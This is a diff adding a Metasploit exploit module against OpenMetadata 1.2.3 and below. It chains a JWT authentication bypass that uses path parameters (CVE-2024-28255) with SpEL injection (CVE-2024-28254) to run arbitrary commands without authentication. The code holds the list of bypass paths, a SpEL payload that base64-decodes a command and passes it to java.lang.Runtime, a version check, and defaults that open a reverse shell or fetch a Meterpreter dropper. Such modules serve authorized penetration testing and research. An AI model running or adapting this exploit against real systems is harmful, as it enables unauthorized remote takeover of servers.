|
| 1 | +## |
| 2 | +# This module requires Metasploit: https://metasploit.com/download |
| 3 | +# Current source: https://github.com/rapid7/metasploit-framework |
| 4 | +## |
| 5 | + |
| 6 | +class MetasploitModule < Msf::Exploit::Remote |
| 7 | + Rank = ExcellentRanking |
| 8 | + prepend Msf::Exploit::Remote::AutoCheck |
| 9 | + include Msf::Exploit::Remote::HttpClient |
| 10 | + include Msf::Exploit::CmdStager |
| 11 | + |
| 12 | + def initialize(info = {}) |
| 13 | + super( |
| 14 | + update_info( |
| 15 | + info, |
| 16 | + 'Name' => 'OpenMetadata authentication bypass and SpEL injection exploit chain', |
| 17 | + 'Description' => %q{ |
| 18 | + OpenMetadata is a unified platform for discovery, observability, and governance powered |
| 19 | + by a central metadata repository, in-depth lineage, and seamless team collaboration. |
| 20 | + This module chains two vulnerabilities that exist in the OpenMetadat aaplication. |
| 21 | + The first vulnerability, CVE-2024-28255, bypasses the API authentication using JWT tokens. |
| 22 | + It misuses the `JwtFilter` that checks the path of url endpoint against a list of excluded |
| 23 | + endpoints that does not require authentication. Unfortunately, an attacker may use Path Parameters |
| 24 | + to make any path contain any arbitrary strings that will match the excluded endpoint condition |
| 25 | + and therefore will be processed with no JWT validation allowing an attacker to bypass the |
| 26 | + authentication mechanism and reach any arbitrary endpoint. |
| 27 | + By chaining this vulnerability with CVE-2024-28254, that allows for arbitrary SpEL expression |
| 28 | + injection at endpoint `/api/v1/events/subscriptions/validation/condition/<expression>`, attackers |
| 29 | + are able to run arbitrary commands using Java classes such as `java.lang.Runtime` without any |
| 30 | + authentication. |
| 31 | + OpenMetadata versions `1.2.3` and below are vulnerable. |
| 32 | + }, |
| 33 | + 'License' => MSF_LICENSE, |
| 34 | + 'Author' => [ |
| 35 | + 'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Msf module contributor |
| 36 | + 'Matias Puerta alias tutte (https://github.com/tutte)' # Original discovery |
| 37 | + ], |
| 38 | + 'References' => [ |
| 39 | + ['CVE', '2024-28255'], |
| 40 | + ['CVE', '2024-28254'], |
| 41 | + ['URL', 'https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-6wx7-qw5p-wh84'], |
| 42 | + ['URL', 'https://attackerkb.com/topics/f19fXpZn62/cve-2024-28255'], |
| 43 | + ['URL', 'https://ethicalhacking.uk/unmasking-cve-2024-28255-authentication-bypass-in-openmetadata/'] |
| 44 | + ], |
| 45 | + 'DisclosureDate' => '2024-03-15', |
| 46 | + 'Platform' => ['unix', 'linux'], |
| 47 | + 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86], |
| 48 | + 'Privileged' => true, |
| 49 | + 'Targets' => [ |
| 50 | + [ |
| 51 | + 'Unix Command', |
| 52 | + { |
| 53 | + 'Platform' => ['unix'], |
| 54 | + 'Arch' => ARCH_CMD, |
| 55 | + 'Type' => :unix_cmd, |
| 56 | + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping' } |
| 57 | + } |
| 58 | + ], |
| 59 | + [ |
| 60 | + 'Linux Dropper', |
| 61 | + { |
| 62 | + 'Platform' => ['linux'], |
| 63 | + 'Arch' => [ARCH_X64, ARCH_X86], |
| 64 | + 'Type' => :linux_dropper, |
| 65 | + 'CmdStagerFlavor' => ['wget', 'curl'], |
| 66 | + 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } |
| 67 | + } |
| 68 | + ] |
| 69 | + ], |
| 70 | + 'DefaultTarget' => 0, |
| 71 | + 'DefaultOptions' => { |
| 72 | + 'rport' => 8585 |
| 73 | + }, |
| 74 | + 'Notes' => { |
| 75 | + 'Stability' => [CRASH_SAFE], |
| 76 | + 'Reliability' => [REPEATABLE_SESSION], |
| 77 | + 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] |
| 78 | + } |
| 79 | + ) |
| 80 | + ) |
| 81 | + register_options( |
| 82 | + [ |
| 83 | + OptString.new('TARGETURI', [true, 'The URI path of the OpenMetadata web application', '/']) |
| 84 | + ] |
| 85 | + ) |
| 86 | + end |
| 87 | + |
| 88 | + def execute_command(cmd, _opts = {}) |
| 89 | + # list of paths that require no authentication |
| 90 | + paths_to_skip = [ |
| 91 | + '/api/v1;v1%2Fv1%2Fusers%2Flogin', |
| 92 | + '/api/v1;v1%2Fv1%2Fusers%2Fsignup', |
| 93 | + '/api/v1;v1%2Fv1%2Fusers%2FregistrationConfirmation', |
| 94 | + '/api/v1;v1%2Fv1%2Fusers%2FresendRegistrationToken', |
| 95 | + '/api/v1;v1%2Fv1%2Fusers%2FgeneratePasswordResetLink', |
| 96 | + '/api/v1;v1%2Fv1%2Fusers%2Fpassword%2Freset', |
| 97 | + '/api/v1;v1%2Fv1%2Fusers%2FcheckEmailInUse', |
| 98 | + '/api/v1;v1%2Fv1%2Fusers%2Frefresh', |
| 99 | + '/api/v1;v1%2Fv1%2Fsystem%2Fconfig', |
| 100 | + '/api/v1;v1%2Fv1%2Fsystem%2Fversion' |
| 101 | + ] |
| 102 | + cmd_b64 = Base64.strict_encode64(cmd) |
| 103 | + spel_payload = "T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(\"#{cmd_b64}\")))" |
| 104 | + paths_to_skip.shuffle!.each do |path| |
| 105 | + res = send_request_cgi({ |
| 106 | + 'uri' => normalize_uri(target_uri.path, path, 'events', 'subscriptions', 'validation', 'condition', spel_payload), |
| 107 | + 'method' => 'GET' |
| 108 | + }) |
| 109 | + break if res.code == 400 && res.body.include?('EL1001E') |
| 110 | + end |
| 111 | + end |
| 112 | + |
| 113 | + def check |
| 114 | + print_status('Trying to detect if target is running a vulnerable version of OpenMetadata.') |
| 115 | + res = send_request_cgi({ |
| 116 | + 'uri' => normalize_uri(target_uri.path), |
| 117 | + 'method' => 'GET' |
| 118 | + }) |
| 119 | + return CheckCode::Unknown('Could not detect OpenMetadata.') unless res && res.code == 200 && res.body.include?('OpenMetadata') |
| 120 | + |
| 121 | + # try to dectect version |
| 122 | + res = send_request_cgi({ |
| 123 | + 'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'system', 'version'), |
| 124 | + 'method' => 'GET' |
| 125 | + }) |
| 126 | + return CheckCode::Detected('Could not retrieve the version information.') unless res && res.code == 200 |
| 127 | + |
| 128 | + # parse json response and get the version |
| 129 | + res_json = res.get_json_document |
| 130 | + unless res_json.blank? |
| 131 | + version = res_json['version'] |
| 132 | + version_number = Rex::Version.new(version.gsub(/[[:space:]]/, '')) unless version.nil? |
| 133 | + end |
| 134 | + return CheckCode::Detected('Could not retrieve the version information.') if version_number.nil? |
| 135 | + return CheckCode::Vulnerable("Version #{version_number}") if version_number <= Rex::Version.new('1.2.3') |
| 136 | + |
| 137 | + CheckCode::Safe("Version #{version_number}") |
| 138 | + end |
| 139 | + |
| 140 | + def exploit |
| 141 | + print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") |
| 142 | + case target['Type'] |
| 143 | + when :unix_cmd |
| 144 | + execute_command(payload.encoded) |
| 145 | + when :linux_dropper |
| 146 | + execute_cmdstager(noconcat: true) |
| 147 | + end |
| 148 | + end |
| 149 | +end |
0 commit comments